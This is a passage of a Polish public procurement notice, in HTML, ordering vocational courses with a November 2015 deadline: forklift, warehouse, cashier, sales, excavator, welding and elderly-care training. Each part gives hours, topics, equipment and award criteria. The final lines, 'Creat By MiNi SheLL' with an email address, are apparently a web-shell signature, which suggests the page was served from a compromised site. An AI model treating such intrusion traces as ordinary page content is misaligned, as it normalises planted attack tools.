Zamówienie obejmuje przeszkolenie 20 osób, w 2 grupach po 10 osób  i realizowane będzie w terminie wskazanym przez Zamawiającego, od podpisania umowy do 30 listopada 2015 r Uczestnicy szkolenia nie mogą mieć więcej niż 8 godzin zajęć dziennie.
Wykonawca zapewni uczestnikom odpowiednią ilość komputerów tzn. tak, aby każdy uczestnik pracował na oddzielnym komputerze ze stosownym oprzyrządowaniem, licencjonowanymi programami komputerowymi niezbędnymi do realizacji zamówienia,                   w tym min. WINDOWS XP lub nowszym i min. MS Office 2000 lub nowszym. Uczestnicy otrzymają podręczniki zgodne z aktualną wersją  oprogramowania używanego podczas szkolenia.
Po zrealizowaniu materiału  odbędzie się egzamin wewnętrzny z części teoretycznej                         i praktycznej szkolenia. Wykonawca sporządzi i przekaże Zamawiającemu protokół                     z przeprowadzonego egzaminu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. posiadanie co najmniej jednego certyfikatu jakości usług - 20</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II,  na którą składają się 2 szkolenia:


1.	Operator wózka jezdniowego z modułem wymiany butli gazowej.
2.	Pracownik magazynu i hurtowni..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Operator wózka jezdniowego z modułem wymiany butli gazowej.

Liczba godzin na szkoleniu musi wynosić min. 48. Szkolenie musi zawierać następujące bloki tematyczne:
Typy stosowanych wózków widłowych;
Budowa wózka;
Czynności  kierowcy przy obsłudze wózków przed podjęciem pracy i po pracy  wózkami;
Czynności kierowcy w czasie pracy;
Wiadomości z zakresu ładunkoznawstwa;
Wiadomości z zakresu BHP, o dozorze technicznym;
Przygotowanie kierowcy do wykonywania czynności wymiany butli;
Praktyczna nauka jazdy: 
	a) jazda wózkiem jezdniowym bez obciążenia przód, tył, ósemkowanie, jazda do celu,
	b) jazda wózkiem jezdniowym bez i z obciążeniem przód, tył, ósemkowanie, jazda do celu,
	c) jazda wózkiem jezdniowym z obciążeniem przód, tył, ósemkowanie, jazda do celu, 	    paletowanie, wysokie składowanie.

Zamówienie obejmuje przeszkolenie 20 osób, w 2 grupach  i realizowane będzie w terminie wskazanym przez Zamawiającego, od podpisania umowy do 30 listopada 2015 r. Uczestnicy szkolenia nie mogą mieć więcej niż 8 godzin zajęć dziennie.
Zamawiający wymaga aby każdy z uczestników odbył min. 33 godziny teorii i min. 15 godzin zajęć praktycznych w tym 10 godzin indywidualnych jazd wózkiem.                                     Wykonawca winien posiadać uprawnienia do prowadzenia szkoleń  oraz wydawania zaświadczeń ukończenia szkolenia wózki jezdniowe z napędem silnikowym                                  oraz bezpiecznej wymiany butli gazowych w wózkach jezdniowych z napędem silnikowym  lub zatwierdzony program szkolenia.
Po zrealizowaniu materiału  odbędzie się egzamin wewnętrzny z części teoretycznej                         i praktycznej szkolenia.  Wykonawca sporządzi i przekaże Zamawiającemu protokół                     z przeprowadzonego egzaminu
Szkolenie zakończy się egzaminem przed komisją UDT, a jego termin musi być zbieżny                 z terminem zakończenia szkolenia. Koszt egzaminu przed komisją UDT będzie częścią składową kosztu szkolenia.



2.	Pracownik magazynu i hurtowni. 

Liczba godzin na szkoleniu musi wynosić min. 180, min. 70% zajęć powinny stanowić zajęcia praktyczne. Szkolenie musi zawierać następujące bloki tematyczne:

Gospodarka magazynowa w przedsiębiorstwie produkcyjnym  i handlowym;
Dokumentacja magazynowa;
Inwentaryzacja stanów magazynowych;
Sprawozdania i analizy;
Podstawy obsługi komputera i komputerowych programów handlowych;
obsługa kas fiskalnych;
Obsługa wózków jezdniowych z modułem wymiany butli gazowej; 
Szkolenie z zakresu przestrzegania zasad higieny w procesie produkcji i obrocie żywnością;
Pierwsza pomoc przedlekarska.

Zamówienie obejmuje przeszkolenie 10 osób - jedna grupa  i realizowane będzie w terminie wskazanym przez Zamawiającego, od podpisania umowy do 30 listopada 2015 r. Uczestnicy szkolenia nie mogą mieć więcej niż 8 godzin zajęć dziennie.
Wykonawca dostarczy  podręczniki z aktualną wersją oprogramowania, na której będą pracować uczestnicy w trakcie zajęć - dotyczy zajęć: Podstawy obsługi komputera                             i komputerowych programów handlowych.
Wykonawca zapewni uczestnikom co najmniej 10 komputerów ze stosownym oprzyrządowaniem, licencjonowanymi programami komputerowymi niezbędnymi do realizacji zamówienia, w tym min. WINDOWS XP lub nowszym i min. MS Office 2000                     lub nowszym oraz 10 kas fiskalnych różnego typu  z oprogramowaniem fiskalnym                                i drukarkami fiskalnymi  i  wózki jezdniowe  z mechanicznym napędem podnoszenia. Zamawiający wymaga aby każdy z uczestników odbył min. 33 godziny teorii i min. 15 godzin zajęć praktycznych w tym 10 godzin indywidualnych jazd wózkiem.                    Wykonawca winien posiadać uprawnienia do prowadzenia szkoleń  oraz wydawania zaświadczeń ukończenia szkolenia wózki jezdniowe z napędem silnikowym                                 oraz bezpiecznej wymiany butli gazowych w wózkach jezdniowych z napędem silnikowym  lub zatwierdzony program szkolenia. Po zrealizowaniu materiału odbędzie się  egzamin wewnętrzny z części teoretycznej i praktycznej szkolenia. Wykonawca sporządzi i przekaże Zamawiającemu protokół z przeprowadzonego egzaminu.
Szkolenie zakończy się egzaminem przed komisją UDT, a jego termin musi być zbieżny                      z terminem zakończenia szkolenia. Koszt egzaminu przed komisją UDT będzie częścią składową kosztu szkolenia.
Wykonawca zabezpieczy w celu realizacji programu podręczniki, schematy, modele                          oraz sprzęt do praktycznej nauki. Moduł Obsługa wózka jezdniowego  dla całej grupy,  nie może trwać dłużej niż 4 tygodnie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. posiadanie co najmniej jednego certyfikatu jakości usług - 20</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III,  na którą składają się 3 szkolenia:

1.	Kasjer - sprzedawca.
2.	Obsługa kasy fiskalnej z terminalem kart płatniczych i sprzedażą internetową. 
3.	Profesjonalny sprzedawca..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kasjer - sprzedawca.

Liczba godzin na szkoleniu musi wynosić min. 40. Szkolenie musi zawierać następujące bloki tematyczne:
Ogólne wiadomości dotyczące obsługi kas fiskalnych;
Budowa i zasady działania kas fiskalnych, wprowadzenie kodu kasjera, sprzedaż                    i operacje anulowane;
Obsługa raportów kasowych, rozliczenia sklepowe;
Obsługa klienta;
Zajęcia praktyczne z obsługi kas fiskalnych;
Wystawianie rachunków i faktur VAT;
Współpraca z systemami komputerowymi.

Zamówienie obejmuje przeszkolenie 10 osób- jedna grupa  i realizowane będzie w terminie wskazanym przez Zamawiającego, od podpisania umowy do 30 listopada 2015 r . Uczestnicy szkolenia nie mogą mieć więcej niż 8 godzin zajęć dziennie.
Wykonawca zapewni uczestnikom min. 10 kas fiskalnych różnego typu z oprogramowaniem fiskalnym i drukarkami fiskalnymi
Po zrealizowaniu materiału  odbędzie się egzamin wewnętrzny z części teoretycznej                       i praktycznej szkolenia.  Wykonawca sporządzi i przekaże Zamawiającemu protokół                     z przeprowadzonego egzaminu

2.	Obsługa kasy fiskalnej z terminalem kart płatniczych i sprzedażą internetową. 

Liczba godzin na szkoleniu musi wynosić min. 100. Szkolenie musi zawierać następujące bloki tematyczne:
Zakres i obowiązki kasjera;
Techniki sprzedaży;
Podstawy obsługi klienta;
Kasy i drukarki fiskalne - sprzedaż hurtowa i detaliczna z wykorzystaniem kas                         i drukarek fiskalnych - budowa i obsługa, BHP przy urządzeniach elektrycznych;
Obsługa komputera;
Programowanie kasy fiskalnej przy użyciu programu komputerowego;
Karty płatnicze - opis rynku kart płatniczych i zasady działania kart płatniczych, rodzaje transakcji kartami płatniczymi, zabezpieczanie kart i procedury weryfikacyjne,  wykonywanie transakcji kartami płatniczymi, budowa terminala PINpada, problemy występujące w czasie instalacji terminala PINpada; 
Doładowania telefonów komórkowych;
Rozliczanie placówki handlowej i kasjerów;
Sprzedaż internetowa;
Praca w sieci, obsługa sklepu, hurtowni i placówki małej gastronomii.

Zamówienie obejmuje przeszkolenie 10 osób - jedna grupa  i realizowane będzie w terminie wskazanym przez Zamawiającego, od podpisania umowy do 30 listopada 2015 r. Uczestnicy szkolenia nie mogą mieć więcej niż 8 godzin zajęć dziennie.
Wykonawca zapewni uczestnikom min. 10 kas fiskalnych różnego typu  z oprogramowaniem fiskalnym i drukarkami fiskalnymi.  
Wykonawca zapewni uczestnikom odpowiednią ilość komputerów tzn. tak, aby każdy uczestnik pracował na oddzielnym komputerze) ze stosownym oprzyrządowaniem, licencjonowanymi programami komputerowymi niezbędnymi do realizacji zamówienia,                     w tym min. WINDOWS XP lub nowszym i min. MS Office 2000 lub nowszym.
Uczestnicy otrzymają podręczniki zgodne z aktualną wersją  oprogramowania używanego podczas szkolenia.
Po zrealizowaniu materiału  odbędzie się egzamin wewnętrzny z części teoretycznej                 i praktycznej szkolenia.  Wykonawca sporządzi i przekaże Zamawiającemu protokół              z przeprowadzonego egzaminu

3.	Profesjonalny sprzedawca.

Liczba godzin na szkoleniu musi wynosić min. 120. Szkolenie musi zawierać następujące bloki tematyczne:
Organizacja własnego stanowiska pracy oraz dobór i posługiwanie się sprzętem zgodnie z jego funkcją oraz przepisami BHP;
Towaroznawstwo;
Organizacja promocji i okazjonalnych stoisk;
Kompozycja towarów i elementów dekoracyjnych  do witryn sklepowych;
Prowadzenie rozmów sprzedażowych w kontaktach z klientami;
Prawne aspekty sprzedaży: przepisy regulujące sprzedaż konsumencką, obowiązki sprzedawcy, niezgodność towaru z umową, zakupy na odległość, gwarancja                             i rękojmia,  reklamacje;
Dokumenty sprzedaży;
Podstawy obsługi komputera i komputerowe programy handlowe Subiekt;
Obsługa kas fiskalnych;
Szkolenie z zakresu przestrzegania zasad higieny w procesie produkcji i obrocie żywnością;
Pierwsza pomoc przedlekarska.

Zamówienie obejmuje przeszkolenie 30 osób, w 2 grupach po 15 osób  i realizowane będzie w terminie wskazanym przez Zamawiającego, od podpisania umowy do                                        30 listopada 2015 r. Uczestnicy szkolenia nie mogą mieć więcej niż 8 godzin zajęć dziennie.
Wykonawca zapewni uczestnikom odpowiednią ilość komputerów tzn. tak, aby każdy uczestnik pracował na oddzielnym komputerze ze stosownym oprzyrządowaniem, licencjonowanymi programami komputerowymi niezbędnymi do realizacji zamówienia,                     w tym min. WINDOWS XP lub nowszym i min. MS Office 2000 lub nowszym.                       Uczestnicy otrzymają podręczniki zgodne z aktualną wersją oprogramowania używanego podczas szkolenia. 
Wykonawca zapewni uczestnikom min. 15 kas fiskalnych różnego typu z oprogramowaniem fiskalnym i drukarkami fiskalnymi.
Po zrealizowaniu materiału  odbędzie się egzamin wewnętrzny z części teoretycznej                 i praktycznej szkolenia.  Wykonawca sporządzi i przekaże Zamawiającemu protokół              z przeprowadzonego egzaminu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. posiadanie co najmniej jednego certyfikatu jakości usług - 20</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV,  na którą składa się 1 szkolenie:


Operator koparkoładowarki kl. III ze wstępnym stażem pracy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Operator koparkoładowarki kl. III ze wstępnym stażem pracy.

Liczba godzin na szkoleniu musi wynosić min. 210 (202 godz. szkolenia + egzamin). Szkolenie musi zawierać następujące bloki tematyczne:
Użytkowanie eksploatacyjne; 
Dokumentacja techniczna;
BHP; 
Podstawy elektrotechniki;
Silniki spalinowe;
Elementy hydrauliki; 
Budowa koparko - ładowarki;
Technologia robót;
Zajęcia praktyczne.

Zamówienie obejmuje przeszkolenie 20 osób, w 2 grupach po 10 osób  i realizowane będzie w terminie wskazanym przez Zamawiającego, od podpisania umowy do                                       30 listopada 2015 r . Uczestnicy szkolenia nie mogą mieć więcej niż 8 godzin zajęć dziennie.
Program musi być zgodny z programem Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego oraz Rozporządzeniem Ministra Gospodarki z dnia 20.09.2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. nr 118 poz.1263 z 2001 r. z późn. zm.)
Wykonawca zapewni w celu realizacji programu co najmniej: tablice poglądowe, schematy, modele, podręcznik, a dla realizacji zajęć praktycznych, właściwy sprzęt budowlany                         i drogowy.
Po zrealizowaniu materiału odbędzie się egzamin  wewnętrzny z części teoretycznej                        i praktycznej szkolenia. Wykonawca sporządzi i przekaże Zamawiającemu protokół                        z przeprowadzonego egzaminu.
Szkolenie zakończy się egzaminem przed komisją IMBiGS, a jego termin musi być zbieżny             z terminem zakończenia szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. posiadanie co najmniej jednego certyfikatu jakości usług - 20</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V,  na którą składa się 1 szkolenie:

Spawanie podstawowe met. MAG (135)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Spawanie podstawowe met. MAG (135).

Liczba godzin na szkoleniu musi wynosić min. 190, min. 70% zajęć powinny stanowić zajęcia praktyczne. Szkolenie musi zawierać następujące bloki tematyczne:

Zagadnienia z zakresu procesów spawalniczych; 
Technika spawania;
Technologia spawania;
Urządzenia i materiały do spawania.

Program zgodny z wytycznymi Instytutu Spawalnictwa, poszerzony przez jednostkę szkoleniową o dodatkowe godziny zajęć praktycznych. Dotyczy spawania blach i rur spoinami pachwinowymi.

Absolwenci uzyskają uprawnienia wydane przez Instytut Spawalnictwa.
Po zrealizowaniu materiału odbędzie się egzamin wewnętrzny z części teoretycznej                 i praktycznej szkolenia. Wykonawca sporządzi i przekaże Zamawiającemu protokół                      z  przeprowadzonego egzaminu. Absolwenci uzyskają uprawnienia Instytutu Spawalnictwa

Zamówienie obejmuje przeszkolenie 10 osób - jedna grupa  i realizowane będzie w terminie wskazanym przez Zamawiającego, od podpisania umowy do 30 listopada 2015 r. Uczestnicy szkolenia nie mogą mieć więcej niż 8 godzin zajęć dziennie.
Wykonawca zapewni uczestnikom, min.: podręcznik, odzież ochronną: spodnie, bluzę i buty (na własność), urządzenia do spawania met. MAG, sprzęt pomocniczy do przygotowywania próbek spawalniczych, spawalnię o wentylacji ogólnej i stanowiskowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. posiadanie co najmniej jednego certyfikatu jakości usług - 20</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część VI,  na którą składa się 1 szkolenie:

Opiekun osób niesamodzielnych: starszych i niepełnosprawnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opiekun osób niesamodzielnych: starszych i niepełnosprawnych.

Liczba godzin na szkoleniu musi wynosić min. 180. Szkolenie musi zawierać następujące bloki tematyczne:

Praca opiekuńcza /podstawy prawne pracy socjalnej, etyka pracy socjalnej/;
Sposoby komunikacji z podopiecznymi;
Empatia;
Radzenie sobie z trudnymi rozmowami i sytuacjami;
Trening asertywności;
Radzenie sobie ze stresem;
Warsztaty terapii zajęciowej;
Podstawy anatomii i fizjologii człowieka;
Podstawy rehabilitacji;
Podstawy masażu leczniczego;
Higiena i odżywiane osób starszych i niepełnosprawnych                             i    elementy patologii chorób wieku starszego;
Opieka nad osobami uzależnionymi;
Pierwsza pomoc przedlekarska.

Zamówienie obejmuje przeszkolenie 30 osób, w 2 grupach po 15 osób  i realizowane będzie w terminie wskazanym przez Zamawiającego, od podpisania umowy do                                              30 listopada 2015 r .
Uczestnicy szkolenia nie mogą mieć więcej niż 8 godzin zajęć dziennie.
Po zrealizowaniu materiału  odbędzie się egzamin wewnętrzny z części teoretycznej                        i praktycznej szkolenia.  Wykonawca sporządzi i przekaże Zamawiającemu protokół                     z przeprowadzonego egzaminu.
W celu realizacji zamówienia Wykonawca zabezpieczy, co najmniej: podręcznik, fantom, podstawowy sprzęt rehabilitacyjny, przybory do wykonywania masażu, sprzęt do wykonywania opieki nad osobą starszą, chorą  lub niepełnosprawną (wózek inwalidzki, balkonik, kule, baseny, kaczki, środki higieny, materiały opatrunkowe). 
Zamawiający nie przewiduje odbywania w trakcie szkolenia zajęć praktycznych w zakładach opiekuńczych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. posiadanie co najmniej jednego certyfikatu jakości usług - 20</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com